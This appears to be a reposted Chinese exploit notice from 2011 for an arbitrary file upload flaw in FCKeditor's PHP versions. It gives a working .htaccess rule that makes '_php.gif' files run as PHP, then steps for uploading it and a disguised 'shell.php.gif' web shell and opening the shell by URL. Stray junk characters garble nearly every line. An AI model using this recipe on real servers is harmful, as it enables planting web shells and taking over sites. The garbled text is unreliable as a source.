FCKeditor所有php版本Upload上传漏洞1 a1 K5 m, Y' A3 Z# z
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
; b+ B. Q- y0 k9 ^3 C' ^/ Y减小字体 增大字体$ x( @& H# u" e% U- L; j H
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability1 r& g: `" N2 W, J
[+] Date: 2011
/ L- N9 d, v' s- S7 k8 ~* Q* }+ `[+] Author : sinesafe.cn
" W) S# x( U+ O$ n9 w[+] Website : WwW.sinesafe.cn( {4 Q" a. V% a# Y( O) ^4 b( b
———————————————————, s/ Z$ E# r5 X' `# X& Q: F" q
1.create a htaccess file:/ E' E2 F4 l8 R* w" d2 b* m4 q
code:
( B; v6 C4 S) s* E3 a, i2 J; x8 F<FilesMatch “_php.gif”>
6 X, Y/ G5 z1 a! K" T4 ^8 JSetHandler application/x-httpd-php7 ]2 C- u2 t3 v
</FilesMatch>4 h% n6 t, o* ?& W
& }, r! j" u8 H6 {/ |7 G( W1 N4 O2.Now upload this htaccess with FCKeditor.
$ m" A1 ~# f; Q/ ~6 X" g0 Y+ \) Z" a: ^" y9 O- F& F, b
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html, U( p! t1 \( B+ h
+ P* `5 R/ ?! \5 T6 g! m2 y
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
+ W8 v' c u" S! {, y6 V i! p5 r
# @" ~5 E; s3 P2 }———————————————————————————————-" N! Q& T" A) L( v$ ^
3.Now upload shell.php.gif with FCKeditor.
6 R ]2 y! ^5 k9 g' Y* o6 w4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
) j/ r' S2 M" x$ M5.http://www.sinesafe.cn/anything/shell_php.gif
0 f- R8 o: G8 D4 p8 W5 s2 \* C6 w6.Now shell is available from server. | ! ]" q) F: ?! v( ^ q0 M" a4 V5 p
' V- a. H9 C6 B+ E! M( m. B
5 J" \; P" R: h1 \5 o6 P$ [# P/ N
|